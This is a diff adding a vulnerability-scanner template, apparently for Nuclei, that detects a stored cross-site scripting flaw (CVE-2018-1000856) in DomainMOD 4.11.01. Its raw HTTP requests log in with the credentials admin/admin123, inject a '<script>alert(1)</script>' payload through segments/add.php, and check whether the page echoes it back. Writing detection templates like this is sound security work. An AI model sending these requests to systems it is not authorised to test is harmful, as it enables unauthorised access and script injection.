Create CVE-2018-1000856.yaml

cves/2018/CVE-2018-1000856.yaml

@@ -0,0 +1,61 @@
+id: CVE-2018-1000856
+
+info:
+  name: DomainMOD 4.11.01 - 'segments/add.php' Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856
+    - https://github.com/domainmod/domainmod/issues/80
+    
+  metadata:
+    verified: true
+  tags: domainmod,xss
+
+requests:
+  - raw:
+
+      - |
+        POST /domain/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+       
+        new_username=admin&new_password=admin123
+
+      - |
+        POST /domain/segments/add.php HTTP/1.1
+        Host: {{Hostname}}    
+        Content-Type: application/x-www-form-urlencoded
+        Origin: https://{{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+
+        new_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test
+
+      - |
+        GET domain//segments HTTP/1.1
+        Host: {{Hostname}}    
+        Content-Type: application/x-www-form-urlencoded
+
+
+    cookie-reuse: true           
+    matchers-condition: and
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(1)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200